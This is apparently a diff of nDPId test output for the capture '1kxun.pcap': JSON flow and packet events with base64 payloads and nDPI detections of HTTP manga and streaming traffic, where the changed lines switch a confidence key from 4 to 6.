wvhzpZYCcnTQp751N8rOVzxV\/WfHjkU4sd7K49tceW9lgtFriIXfLRX0lnDo7qn2MdshEdzZ1D64xjC2q4wwt3IZ2n4p\/pneRHtsyhUh728KWWTws4KukVDqGu\/dGxWWHQfL08wKvuCRAldq02w2xcfI8OLS1BZJ8ojWW+zHDGOLc2PGT2jKi9Wp7Ruxc7n2D1jdnEJ1bz1KM38qJQK\/Ue0AyXaxr2V5ayN9p02bX65ILqcI\/UD35cOTKU5BwZ69QfZt6mdSJwrBzgsMyozo9GisNg6WrPunvNSdLUc4nbDmdosbUeZzxhFukYyqW3BONN2JL3sLVu7Lk\/d+jTNBjE7SlOgw2S0ie8BM5vFS5sEXKPHLgvv4XaSVZ27AGTJFFiyFUbGq3Z04CqqN4luHFjERq\/HDsxXmr\/ACFj1JSXVziFY6tzFTtbHMtcIZx\/bI8zGmFODGuTi+2AzbkPjIPaxs+6Hxlufd9Jea8iA6smBV3iBGN+6bVnrEU8gnJzTP8AHi1pcQr9cDHTKc6Wx75u7mP2gPtBGhktMo27Z3nlqPuBMRnDq0mdpm4xP71yuq+PEKK44Vg+IjWYXkhGPyz2xLNkkWRGvIO5QO6NkjkRnfNxRkmUYepQE9uU+I8TGuI7ZGDIjBM1yy37X0jn+P8AaG5Zfpa4XT3ZOT853LwyA57ZBhnnNCy3\/KR+WrlL89j4Zp\/y4v8AGvIwsPLXkfOD4LwHwH48ixnn+5+I+fIsHxi8H4fu15sfn\/Q5+585HngHyblr+Wv8c5\/acmI3bRzwx\/YYmdP\/xAAqEQACAgEE"} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146710,"pkt":"nLbQ0+MztKXvZygQCABFAAXUgVlAADYGY7AOiIhswKgCfgBQwORvtNcRImpQ7oAQAHoCWgAAAQEICpoJIwAeulfZAgICAQUBAQAAAAAAAQIREAMSITEgQRMiBDJRIzBCYXFigf\/aAAgBAwEBPwHwT4w8bm3USMYxX27PjlLlkYJD1Ir2KafTHpqx2v26HH3EU7EPHsmL+zZdjdCUtT\/h\/wCYGlBdk9ZRG5T\/AGdDWmlwPa+iMpR7N6l0ONfqTpkZl4smLFZlwJ4RYo0N2fI62kNaCW0nq+oEYe2LTjRLbfBpxi0ShGOLeEqLojK8TEIcrzqO3Ylm6Q5WXh4it\/Bzp8mhX\/0nJRnwSL\/jx6LJiwvBZk8vKtPgk3XJPreicVGA2JWdFi5KxEmIXeGX5NCid8FFcDQp0uUKM5Kie6L+w\/5EuCUaFGzZQuTo2ut6JOxZZXik3yNC4VjUeyjckLklSIytWa7W2vYkmuySo9YuyL5H2afdeiqIrF5Xgl\/TY2N4TEvtRONS2lx0o17Kjsv2OLi7JKL5RJJxtF5SpFlXEu+xf2dSdQoVpk408I0dNzdnxJ6m01dNQR+5OcktjPjTIxsktuIw9smx\/wAkJR28k6vgXkot9ZVOZqcITTJaf8FGjqqCpm9p77F95W2JqH1kS1N8ro+0SLUGSlZGKXI3Q3YkuhRvhdmpGmIWJK8qbXWfx+Z0a8eLGqE+CUZVbO4kokG0+DfIUmjfLKkX6KwnTs1J7neL8oxbIxSVGjppcjjaJx2umM+
W4bTTltZrxqmiiiisR021Z1i\/DabfGOjYoqIuRKsfkwtWIsuiWpujtEhtIaKKN\/1rzssrPRZKddn4rc3eWrRqR2yaFiKoRLUjdCeGhupULKyi8PvD1odHy30PcnyaGvt\/4KSasnrbejT1dySNWMlLk6xFNsrkdCdEluO0NclYRtLihixY2Wh8TGjsiq4NLX+N89EoqfJopxZrxuGLNL9icK5HhD46yxriy8PwfeNRdPwmaWq48Gm7ZPofYjS\/ZH5MtsaFTjQtMdLosReKoQ1fg8Ujbu4I\/iR9s\/J0VCKccT7I9o3VTJMl2McmhycuxG\/Ho3F4trsv+CzvwWdOfHJrx3QeJ94+T60zQ1r+jNT9i\/Kv5wmJknYv9DZ6OUX4ItpkJzlKia2yaJYYnTsb9mnpSkT09vh0PoeIsbTRvOH7JZXglFnEI2Tm27Y3Ymd8iVmlpQ9iiakOGihtCd8Ej14XheC8FI1NVylRZSNpVY0Hx\/zE198r9jVRNkY8DWGsIZWI5eGuSvBmh7QpfU1JrsfIhGq7Q+RSGhrCXhVi\/t6LakamrtG5SEuBCJdeHY8VwesLEJblfihFihJkdJezo1OZFliOmSXAvBlG2O2\/FKvFo\/0RnXSPkmW\/bHqpdF+8oqz0dYjKuzchsZtf7ZoXlFWa0Psj5GNtlCVj4wxcFikNZoaw39PBE+jaxyFO1WNPs1K8ExliOxPCbXI5buiKHed7khl0hdY9nAo2bafB8basTou8cnwzZKO10N4WGy0WaenvQ9GSKaHxhP61iSuNEVUaFbXJRSE+ax2Vj4qSbNLRdHxcck5W2xiy2Xj8OdTocV\/A9GLNT8Z+iUUl1ybvullFexssQo2KVMkLs+NY\/I1NumxK3QxZeIqzQ\/dFn5WrKKVGnxBH5CjdlXK8rovLEx9FkjT1px6I\/k8Wz8rWUo8Dd4jl5\/GX9RFmq0+JLgjq7VtRrS5P8h5cjdZbGUV7OyhH+JrO8IhC1ZsPj+o8RNOPs03T7Jz3G+sN\/dDxaaxGBTLsXAvsS44Gzo0tRPgm7wl6NpRN1F4oSIcxxLhFtyw\/2RJ0OTZFcclIRSJOiLuPJdZkuCH16GhcGirdlY1l9co0lwdGoyixolyQXsTxeGf6EiRBWa6pcEHyW3wM0VwRijUjRNWhixodGoy7wj\/Ej+7Xl\/\/EACoRAAICAQQBBAICAwEBAAAAAAABAhEDEBIhMSIEEzJBUWEgQhQzQwWB"} -01027{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":1611,"midstream":1,"thread_ts_msec":1654385146710,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} -01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2000,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385147585,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01027{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146710,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":1611,"midstream":1,"thread_ts_msec":1654385146710,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":489,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":489,"pkt_l4_len":455,"thread_ts_msec":1654385156800,"pkt":"tKXvZygQnLbQ0+MzCABFAAHb3B5AAEAG2pzAqAJ+rNkSYq1QAFBdWbpPyM9cBIAYAfaELwAAAQEICmU8LGE7CqI\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"} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.googletagservices.com","url":"www.googletagservices.com\/tag\/js\/gpt.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2035,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156800,"flow_last_seen":1654385156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1654385156800,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.googletagservices.com","url":"www.googletagservices.com\/tag\/js\/gpt.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
02383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1654385156832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385156832,"pkt":"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\/\/2t6iC1wgDecM5+OHuvGanVsbq6UldXq958aM\/C0VDd1R5vyWTlLhw6oztzFoTTTuip7LXoj0Z+350Rf20teiy6t6R\/Zk\/C8WyqPeYmq1pn8UIlP\/sj4rjOT23izuaTYWfjr\/\/5n5Xt0fhhEvrBbOU8cFe2+6PpfOKuHIbWhEweVjbns2A0mRb\/Z+Xs08639cPQdodTd33fcYez0AvdSXtlc0zswF0vF0v\/89fG\/+C4BjohZjRYwgZrmaUOa3cl+qQ98hTrLSn23aE\/C7qPzmjotlcNHYY2d9vkyioUrhdtnlxaLBa6RUxF1KGY5uxh7I68lRPrxrVnRcf1wqH7aTIau5NZ6E67eekP7bh7uqXb2iOAjpjm5mRCHorjyWg2wlqfniCNl48SOfRWSAf6dm3aRdpRMTay0O3k4Il5pYxoHXFf\/f7IIv1zmHiYn+hZJ3omJ5vPtTX2m\/0+dfve2hr+zX5jNYsWrjveaKKKqYgh3ikULDZFtokjQlS019bs4hGZBaaJf8WQ7cUsmIzuVnYnE6hK2SbD4Wi2AnB1eFsrvAuAi7pDTJuoiNya7iZnTHTw7GFgjaCDypQ+ZL6oyr2i6UPzcaF7BP\/+MuV5E732RLeH837fNO1ohjAZB2Vfi+m5HYXOSmkVMnVtxK3rhT4zc3DB0kib1u6YpDgd98OZqhRhWMQ0oJOOAB3mcE3nqnSte51VsrbmroTDlWHXM4dtz3QIBbkL4HbfijLrRsctFFjXAyjq0p6vqgGW9DTNmrikB8jlmd5VcL1wIEtcFIfjQjOKO60jtOyud+Vct3HcHcu0VFvr4POqaa2tqaRrEXWoO\/qjPRp6oT+fEKuPa0i\/m4Qz8cyWmbXQ2haCBcoxGEHtAFfnGisyjd3WX4gIxQkBNByo2rt370o6\/Q796TqkyCfM0drKm5upPX6jFEg="} 
02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1654385156832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385156832,"pkt":"nLbQ0+MztKXvZygQCABFAAW+HaIAAHsGmjas2RJiwKgCfgBQrVDIz2cYXVm79oAQAQVnbAAAAQEICjsKomxlPCxhBD2AVIoQ9JAQ9DghsJcRAl\/vYRNoLvC7pbbP4e4wzRva7Rf74XT29KSyB5P1+gpURecaOC5mGHThH2ve7LUh44DrNWxc+pQ\/FKd64BJHJAMZaPu6oBs6q58J\/VCFpotCdKgwe4MoJX5BSAG\/TBIN+5m1SgEaj46X84uDtTWfdqCrsl+qftouvIEY4N7rBjAm9oHx66cnvpo5QHwECGQZiA7jIz7o4gH6TT\/TBASEiXw0Hsf6ur5a0ihBkEdg910ykeWfDN5EYEkhULKeBOHzI7RdjYBRHCQLJOhtVECVwAezhGCjU5gsy1dtjvLqssLZigGCgBE6r+4aTThyjfDtj6pbodWla6F1\/2k9bHypmmA97hI7SK0ksUr7bFIk4gXLNiZBYtmOBZmBYVMRr6ePYcXCnxLjGslGl9oIckDPpZRk9zhRXVvj9L\/XiQW7flKa64Mqj7JRT+v2QRhHEt7TYHGbilJYKRQC3WJURu9rWhtSxyAA9WijY0BzIBBUch1TJgjvmA2BA6Sm478dC8HcF8LuxBxf+bRIDyRL6OEEpw8e6S+wDZM\/cgr7GDrtvo7rsT3W6QoFWjJoTxaLpd\/XDcjARYKFbLiTQOMXIwEkICl+22fTCwQPF+8qzav1YU6nHZ6Ok7tqsu8dwQr6fNb11M5IDypcdPqUCIhO800SnkP0VVvIgqSQ0B8XMfWacoaAkEfC4i\/0IN6vsRN6\/SxtCSG56gopwExr3Cxa0h1QgQFmjK6n5BBQ7+xoO4J1zzNB5eLtc9HQUj2dgEKj6RwOiwVUKjq5ZOiLznKkz1nEklkUZSimHxbD6TE5foUmJ5KVIS0nGRKttTVaCeRZJIA5TwKT7z6wfQySb\/nFbbq\/49r++wodK2rhHOzSKlYKdkFZGcynM2oosNwVrHQFssaWOyoHWfLsnbr+7v04v929cAKVCfV3ZTZ6TaNkZeL68z5qqvfjiTudInGITRUFRWGGfnf2f1lYtfOEVScWVm0upq46lKrZTER1uIjqFInjQCKk5KSz2ui3sviWFFRRjY9pvWe6kqDqcTHTkwRVO3418DWuTSortIJMeRPLg9TqJaRWucL4Cwqrriy9crk1eF5ujSbPjtRWJsqCGEs3GLVHG+RSO5ZLHWBwDjCiJIOjZRGGDjfjLmL5RIgt8JzcrYH8iQ7YVDy1QTy1O6IQsB4bTUu51SXFQesZcZDWzktyO8FLldrJGvPFM5+lp+Uxa5k8Zqf2oziSJkssF6p4oQgFk+WWCj2\/VC6KKyyLojEpJNJ6rbQA9ku2NsbF5IxL6fUrymalKrQPPrIlRm1rfKQ8X0xkvFgHZ2NwdA\/+A4SL98qsxF5ZmvgBEZ3MphfhLHil0Y8JWHO+SWmBMhzXgOYfybIX71wxy8+A3KslnT2GMMgnYLCCf8ZLCll48NZD7gpLCS3\/V8BVYXlbVwH8xkRDSCzvTG\/x7Bgn7tgls1exQkZUxeiopqLw4pSsld5ZQCor1bLRaJQbrbeyrfuU
DH03ZU6yR3PgOnTScc6f0NopSAdIGh2LjtBaM9BUWgCSqFvv3r0zDc2GFzFCJzG82PNi2ZaGw7Y0fpZL5dISkIyJc4bz9k9NOgNLVAWMaz12LrBNyVuBW\/dsra2sKHw4auktCBZ29xdgeQRbYeqlyGG7YV+1NuwIN4rTuTVlVZVAdmvjrjAHSpMNMG3FxmX78thiSkJSilC8VWYttAT40y3xBf2vtKXHdNAWrfFxcfa+bK4zEyU6zTgHbsYAum7gq7FhU18JhD3OzbODCod2f+68ZlgSerx2FyC5AwAIA3ydLYvSO\/TkkKiFXXD1EhRBUhDtDXqmw\/cEPZMOMN51DCNizlM8QBdBMcRWAfJ+HHtjydr4w8GzD+sgP8lUMao="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1654385156962,"pkt":"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"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/left.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2055,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156962,"flow_last_seen":1654385156962,"flow_idle_time":7580000,"flow_min_l4_payload_len":1112,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":1112,"midstream":1,"thread_ts_msec":1654385156962,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/left.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01961{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1654385156971,"pkt":"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"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/like_1.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156971,"flow_last_seen":1654385156971,"flow_idle_time":7580000,"flow_min_l4_payload_len":1114,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":1114,"midstream":1,"thread_ts_msec":1654385156971,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/like_1.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01966{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1184,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1184,"pkt_l4_len":1150,"thread_ts_msec":1654385156978,"pkt":"tKXvZygQnLbQ0+MzCABFAASS0r1AAEAG8e\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"} 
-00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/more_white.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/more_white.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 